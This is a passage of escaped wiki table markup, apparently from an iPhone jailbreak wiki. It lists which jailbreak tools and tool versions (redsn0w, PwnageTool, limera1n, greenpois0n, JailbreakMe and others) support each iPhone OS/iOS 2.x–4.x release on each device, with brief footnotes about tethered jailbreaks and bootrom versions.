| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[QuickPwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz nobrradiusplz&amp;quot; | 2.2.1-2.2.5&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz nobrradiusplz&amp;quot; | 0.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;2.x&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====3.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iPhone OS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;7&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[K48AP|iPad]]&lt;br /&gt;
! [[M68AP|iPhone]]&lt;br /&gt;
! [[N82AP|iPhone 3G]]&lt;br /&gt;
! [[N88AP|iPhone 3GS]]&lt;br /&gt;
! [[N45AP|iPod touch]]&lt;br /&gt;
! [[N72AP|iPod touch (2nd generation)]]&lt;br /&gt;
! [[N18AP|iPod touch (3rd generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 3.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[purplera1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8-0.9.3&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 3.0.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8-0.9.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 3.1&lt;br /&gt;
| [[blackra1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot3gs&amp;quot;&amp;gt;Tethered jailbreak for any [[N88AP|iPhone 3GS]] with the [[Bootrom 359.3.2|new bootrom]]. Untethered for the [[Bootrom 359.3|old bootrom]].&amp;lt;/ref&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.1-3.1.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.2-0.9.3&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 3.1.1&lt;br /&gt;
| [[blackra1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.1.3&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.3&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot&amp;quot;&amp;gt;Tethered jailbreak for any [[N72AP|iPod touch (2nd generation)]] with the [[Bootrom 240.5.1|new bootrom]]. Untethered for the [[Bootrom 240.4|old bootrom]].&amp;lt;/ref&amp;gt;&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; | 3.1.2&lt;br /&gt;
| [[blackra1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.1.4-3.1.5&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.2-0.9.3&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | Public Beta-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Spirit]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; | 3.1.3&lt;br /&gt;
| [[blackra1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.1.5&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.4&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;oldboot&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.5-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Spirit]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 3.2&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz nobrradiusplz&amp;quot; | ???-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Spirit]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 3.2.1&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz nobrradiusplz&amp;quot; | ???-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 3.2.2&lt;br /&gt;
| [[greenpois0n (jailbreak)|greenpois0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | RC4&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; colspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[limera1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.1-4.1.3&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6b2-0.9.11b4&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz nobrradiusplz&amp;quot; | 2.1-2.9.14&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;3.x&amp;quot; name=&amp;quot;modifiedstar&amp;quot;&amp;gt;Star can be modified to support 3.2.2, because Apple did not correctly patch the exploits used.&amp;lt;/ref&amp;gt;}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;3.x&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===iOS===&lt;br /&gt;
====4.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;9&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[K48AP|iPad]]&lt;br /&gt;
! [[iPad 2]]&lt;br /&gt;
! [[N82AP|iPhone 3G]]&lt;br /&gt;
! [[N88AP|iPhone 3GS]]&lt;br /&gt;
! [[N90AP|iPhone 4 (iPhone3,1)]]&amp;lt;!-- Separated because GSM and CDMA were on two different codebases at this point --&amp;gt;&lt;br /&gt;
! [[N92AP|iPhone 4 (iPhone3,3)]]&lt;br /&gt;
! [[N72AP|iPod touch (2nd generation)]]&lt;br /&gt;
! [[N18AP|iPod touch (3rd generation)]]&lt;br /&gt;
! [[N81AP|iPod touch (4th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[limera1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.0-4.01&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{partial|Yes}}&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;oldboot&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.5b3-0.9.6b3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.6-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.0.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[limera1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.0&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;bundle&amp;quot; /&amp;gt;&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.5b3-0.9.6b3&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.6-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.0.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[limera1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.0&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;oldboot3gs&amp;quot; /&amp;gt;&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;bundle&amp;quot; /&amp;gt;&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.5b3/0.9.6b3&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;oldboot&amp;quot; /&amp;gt;&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.0.2-2.9.14&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; | 4.1&lt;br /&gt;
| [[greenpois0n (jailbreak)|greenpois0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | RC5-RC6.1&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[limera1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.1-4.1.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6b1-0.9.10b8b&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.1-2.9.5&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot;  | 4.2.1&lt;br /&gt;
| [[greenpois0n (jailbreak)|greenpois0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | RC5-RC6.1&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.2&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6b1-0.9.11b4&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2-2.9.14&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| 4.2.5&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; | 4.2.6&lt;br /&gt;
| [[greenpois0n (jailbreak)|greenpois0n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | RC5 b4-RC6.1&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; colspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
